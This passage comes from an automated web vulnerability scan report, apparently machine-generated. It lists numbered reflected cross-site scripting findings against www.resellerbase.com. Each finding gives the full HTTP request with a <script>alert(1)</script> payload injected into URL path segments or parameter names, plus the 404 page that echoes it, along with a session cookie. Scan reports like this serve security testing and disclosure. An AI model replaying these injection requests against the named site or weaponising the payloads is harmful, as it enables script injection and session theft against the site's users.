Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Search&opt=245792<a>7debffc74b4 was not found on this server.</p>
...[SNIP]...

2.3280. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bfe6<script>alert(1)</script>538fc7d0b51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3bfe6<script>alert(1)</script>538fc7d0b51/46/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3bfe6<script>alert(1)</script>538fc7d0b51/46/themes/ was not found on this server.</p>
...[SNIP]...

2.3281. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c55ae<script>alert(1)</script>16b30ae5820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46c55ae<script>alert(1)</script>16b30ae5820/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46c55ae<script>alert(1)</script>16b30ae5820/themes/ was not found on this server.</p>
...[SNIP]...

2.3282. http://www.resellerbase.com/detail/46/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dca51<script>alert(1)</script>2f1f4b42ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesdca51<script>alert(1)</script>2f1f4b42ac/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3283. http://www.resellerbase.com/detail/46/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a05c<script>alert(1)</script>a4fc897d5e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/?9a05c<script>alert(1)</script>a4fc897d5e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/?9a05c<script>alert(1)</script>a4fc897d5e1=1 was not found on this server.</p>
...[SNIP]...

2.3284. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f163<script>alert(1)</script>86cc6a511be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5f163<script>alert(1)</script>86cc6a511be/46/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5f163<script>alert(1)</script>86cc6a511be/46/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3285. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b564<script>alert(1)</script>2990983e5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/462b564<script>alert(1)</script>2990983e5c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/462b564<script>alert(1)</script>2990983e5c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3286. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b525e<script>alert(1)</script>1965f1466ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesb525e<script>alert(1)</script>1965f1466ac/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesb525e<script>alert(1)</script>1965f1466ac/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3287. http://www.resellerbase.com/detail/46/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bae<script>alert(1)</script>180ed4975fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos91bae<script>alert(1)</script>180ed4975fd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos91bae<script>alert(1)</script>180ed4975fd/ was not found on this server.</p>
...[SNIP]...

2.3288. http://www.resellerbase.com/detail/46/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5f10<script>alert(1)</script>a39e3aa881d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/?c5f10<script>alert(1)</script>a39e3aa881d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/?c5f10<script>alert(1)</script>a39e3aa881d=1 was not found on this server.</p>
...[SNIP]...

2.3289. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6299d<script>alert(1)</script>38fc1b4be3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6299d<script>alert(1)</script>38fc1b4be3/46/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6299d<script>alert(1)</script>38fc1b4be3/46/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3290. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e97c6<script>alert(1)</script>0f5abd5eacb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46e97c6<script>alert(1)</script>0f5abd5eacb/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46e97c6<script>alert(1)</script>0f5abd5eacb/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3291. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3bc7<script>alert(1)</script>98234474274 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesd3bc7<script>alert(1)</script>98234474274/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesd3bc7<script>alert(1)</script>98234474274/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3292. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c135<script>alert(1)</script>6048f61cfa3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos2c135<script>alert(1)</script>6048f61cfa3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos2c135<script>alert(1)</script>6048f61cfa3/images/ was not found on this server.</p>
...[SNIP]...

2.3293. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba76a<script>alert(1)</script>74aa0ed5f1e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagesba76a<script>alert(1)</script>74aa0ed5f1e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagesba76a<script>alert(1)</script>74aa0ed5f1e/ was not found on this server.</p>
...[SNIP]...

2.3294. http://www.resellerbase.com/detail/46/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b09c0<script>alert(1)</script>d6721498236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/?b09c0<script>alert(1)</script>d6721498236=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3295. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 144e8<script>alert(1)</script>453701a1ff6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail144e8<script>alert(1)</script>453701a1ff6/46/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail144e8<script>alert(1)</script>453701a1ff6/46/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3296. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa4aa<script>alert(1)</script>de212c40f15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46fa4aa<script>alert(1)</script>de212c40f15/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46fa4aa<script>alert(1)</script>de212c40f15/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3297. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec2bd<script>alert(1)</script>25c721e6725 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesec2bd<script>alert(1)</script>25c721e6725/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesec2bd<script>alert(1)</script>25c721e6725/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3298. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 23498<script>alert(1)</script>dd3b390b98e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos23498<script>alert(1)</script>dd3b390b98e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos23498<script>alert(1)</script>dd3b390b98e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3299. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c92d6<script>alert(1)</script>fa97aa6ec66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagesc92d6<script>alert(1)</script>fa97aa6ec66/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagesc92d6<script>alert(1)</script>fa97aa6ec66/rating/ was not found on this server.</p>
...[SNIP]...

2.3300. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

